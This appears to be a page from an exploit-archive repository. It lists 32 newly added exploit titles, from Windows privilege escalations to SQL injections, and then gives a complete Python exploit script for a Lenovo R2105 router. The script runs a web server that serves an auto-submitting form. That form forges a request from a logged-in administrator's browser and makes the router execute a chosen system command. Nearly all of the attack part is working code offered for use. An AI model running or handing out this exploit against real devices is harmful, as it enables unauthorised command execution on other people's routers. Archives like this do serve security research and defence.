518c704a2f
32 changes to exploits/shellcodes xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation Microsoft Windows 10 - COM Desktop Broker Privilege Escalation Hootoo HT-05 - Remote Code Execution (Metasploit) Across DR-810 ROM-0 - Backup File Disclosure i-doit CMDB 1.12 - Arbitrary File Download i-doit CMDB 1.12 - SQL Injection Horde Imp - 'imap_open' Remote Command Execution Modern POS 1.3 - Arbitrary File Download Modern POS 1.3 - SQL Injection Twilio WEB To Fax Machine System Application 1.0 - SQL Injection Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin) Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection Find a Place CMS Directory 1.5 - SQL Injection Cleanto 5.0 - SQL Injection Lenovo R2105 - Cross-Site Request Forgery (Command Execution) HealthNode Hospital Management System 1.0 - SQL Injection Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account) ThinkPHP 5.X - Remote Command Execution Real Estate Custom Script 2.0 - SQL Injection Job Portal Platform 1.0 - SQL Injection Umbraco CMS 7.12.4 - Authenticated Remote Code Execution Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection AudioCode 400HD - Command Injection
47 lines
No EOL
1.3 KiB
Python
Executable file
47 lines
No EOL
1.3 KiB
Python
Executable file
# Exploit Title: Lenovo R2105 Remote Code Execution through CSRF
|
|
# Date: 01/14/2019
|
|
# Exploit Author: Nathu Nandwani
|
|
# Website: http://nandtech.co/
|
|
# Version: 1.0
|
|
# Tested on: Windows 10 x64
|
|
# Note: The administrator who opens the URL should be authenticated.
|
|
|
|
import socket
|
|
|
|
server_ip = "0.0.0.0"
|
|
server_port = 80
|
|
router_ip = "192.168.11.1"
|
|
|
|
command = "reboot"
|
|
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
sock.bind((server_ip, server_port))
|
|
sock.listen(1)
|
|
|
|
print "Currently listening at " + server_ip + ":" + str(server_port)
|
|
|
|
client, (client_host, client_port) = sock.accept()
|
|
|
|
print "Client connected: " + client_host + ":" + str(client_port)
|
|
print ""
|
|
print client.recv(1000)
|
|
|
|
client.send('HTTP/1.0 200 OK\r\n')
|
|
client.send('Content-Type: text/html\r\n')
|
|
client.send('\r\n')
|
|
client.send("""
|
|
<html>
|
|
<body>
|
|
<form method="post" id="frmcmd" name="frmSetup" action="http://""" + router_ip + """/goform/SystemCommand">
|
|
<input name="command" value=""" + command + """ type="hidden">
|
|
<input name="SystemCommandSubmit" value="Apply" type="hidden">
|
|
</form>
|
|
<script>
|
|
document.getElementById("frmcmd").submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
""")
|
|
|
|
client.close()
|
|
sock.close() |